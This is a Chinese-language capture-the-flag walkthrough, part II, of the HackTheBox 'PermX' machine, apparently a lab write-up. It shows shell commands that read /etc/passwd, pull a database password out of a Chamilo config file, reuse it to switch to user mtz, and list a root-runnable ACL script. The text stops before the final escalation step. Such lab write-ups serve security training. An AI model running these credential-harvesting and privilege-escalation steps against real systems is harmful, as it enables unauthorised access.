[HackTheBox] PermX – Easy – Part II – 权限提升-红客联盟

Web目录

当前权限下信息收集

www-data@permx:/home$ ls
mtz
www-data@permx:/home$ grep 'sh$' /etc/passwd
root:x:0:0:root:/root:/bin/bash
mtz:x:1000:1000:mtz:/home/mtz:/bin/bash

Web目录有两个文件夹

www-data@permx:/var/www$ ls
chamilo  html

www-data@permx:/var/www$ ls html/
404.html  LICENSE.txt  READ-ME.txt  about.html  contact.html  courses.html  css  elearning-html-template.jpg  img  index.html  js  lib  scss  team.html  testimonial.html

Chamilo实例

www-data@permx:/var/www$ ls chamilo/
CODE_OF_CONDUCT.md  README.md             bin           cli-config.php  composer.lock  favicon.ico  license.txt    plugin      terms.php     vendor       whoisonline.php
CONTRIBUTING.md     app                   bower.json    codesize.xml    custompages    favicon.png  main           robots.txt  user.php      web          whoisonlinesession.php
LICENSE             apple-touch-icon.png  certificates  composer.json   documentation  index.php    news_list.php  src         user_portal.phpweb.config

cli-config.php没有显示任何凭据，但它引用了另一个配置文件：

$configurationFile = __DIR__.'/app/config/configuration.php';

该文件很长，但它以数据库连接信息开头

<?php
// Chamilo version 1.11.24
// File generated by /install/index.php script - Sat, 20 Jan 2024 18:20:32 +0000                                                              
/* For licensing terms, see /license.txt */
/**
 * This file contains a list of variables that can be modified by the campus site's server administrator.                                     
 * Pay attention when changing these variables, some changes may cause Chamilo to stop working.                                               
 * If you changed some settings and want to restore them, please have a look at
 * configuration.dist.php. That file is an exact copy of the config file at install time.                                                     
 * Besides the $_configuration, a $_settings array also exists, that
 * contains variables that can be changed and will not break the platform.
 * These optional settings are defined in the database, now
 * (table settings_current).
 */

// Database connection settings.
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Enable access to database management for platform admins.
$_configuration['db_manager_enabled'] = false;
...[snip]...

密码是“03F6lY3uXAP2bkW8”

Sudo/SSH

www-data@permx:/var/www/chamilo$ su mtz
Password: 
mtz@permx:/var/www/chamilo$

至此我们获取到了User权限

Root权限

当前权限下信息收集

mtz@permx:~$ ls -la
total 32
drwxr-x--- 4 mtz  mtz  4096 Jun  6 05:24 .
drwxr-xr-x 3 root root 4096 Jan 20 18:10 ..
lrwxrwxrwx 1 root root    9 Jan 20 18:12 .bash_history -> /dev/null
-rw-r--r-- 1 mtz  mtz   220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 mtz  mtz  3771 Jan  6  2022 .bashrc
drwx------ 2 mtz  mtz  4096 May 31 11:14 .cache
lrwxrwxrwx 1 root root    9 Jan 20 18:37 .mysql_history -> /dev/null
-rw-r--r-- 1 mtz  mtz   807 Jan  6  2022 .profile
drwx------ 2 mtz  mtz  4096 Jan 20 18:10 .ssh
-rw-r----- 1 root mtz    33 Jan 20 18:16 user.txt

sudo

mtz可以以任何用户身份运行Bash脚本sudo

mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh

该脚本允许用户为文件设置文件访问控制列表 (FACL)

#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"